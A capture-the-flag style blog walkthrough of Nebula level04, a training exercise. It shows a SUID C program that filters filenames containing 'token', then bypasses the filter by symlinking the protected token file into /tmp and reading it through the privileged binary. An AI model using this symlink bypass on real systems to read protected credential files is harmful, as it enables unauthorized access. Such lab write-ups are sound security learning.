Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Source code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> #include <fcntl.h> int main(int argc, char **argv, char **envp) { char buf[1024]; int fd, rc; if(argc == 1) { printf("%s [file to read]\n", argv[0]); exit(EXIT_FAILURE); } if(strstr(argv[1], "token") != NULL) { printf("You may not access '%s'\n", argv[1]); exit(EXIT_FAILURE); } fd = open(argv[1], O_RDONLY); if(fd == -1) { err(EXIT_FAILURE, "Unable to open %s", argv[1]); } rc = read(fd, buf, sizeof(buf)); if(rc == -1) { err(EXIT_FAILURE, "Unable to read fd %d", fd); } write(1, buf, rc); }

We read our code above. There are arguments that state if we give the appropriate argument, we will read the file. If it's token but we don't ave access, we fail. If it's a file we cannot read, we fail. If we break the buffer, we fail.

So, it looks like we need proper privileges to read the token file.

With our information in hand, we SSH into the host:

1 2 3 4 5 6 7 8 9 10

level04@nebula:/home/flag04$ ls -lah total 13K drwxr-x--- 2 flag04 level04 93 2011-11-20 21:52 . drwxr-xr-x 1 root root 60 2012-08-27 07:18 .. -rw-r--r-- 1 flag04 flag04 220 2011-05-18 02:54 .bash_logout -rw-r--r-- 1 flag04 flag04 3.3K 2011-05-18 02:54 .bashrc -rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04 -rw-r--r-- 1 flag04 flag04 675 2011-05-18 02:54 .profile -rw------- 1 flag04 flag04 37 2011-11-20 21:52 token level04@nebula:/home/flag04$

Per usual, we see the flag04 file is has SUID and is owned by flag04 and allows level04 (us) to run it.

We run the file to get a feel with what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around and realizing that the code allows us to execute, we just need to create a symbolic link on a file that "we" own and have the program call that file.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We create a symbolic link to /tmp/level04 to /home/flag04/token. We verify with ls -lah.

We then test our theory and execute:

level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.

Thanks for reading!

-geoda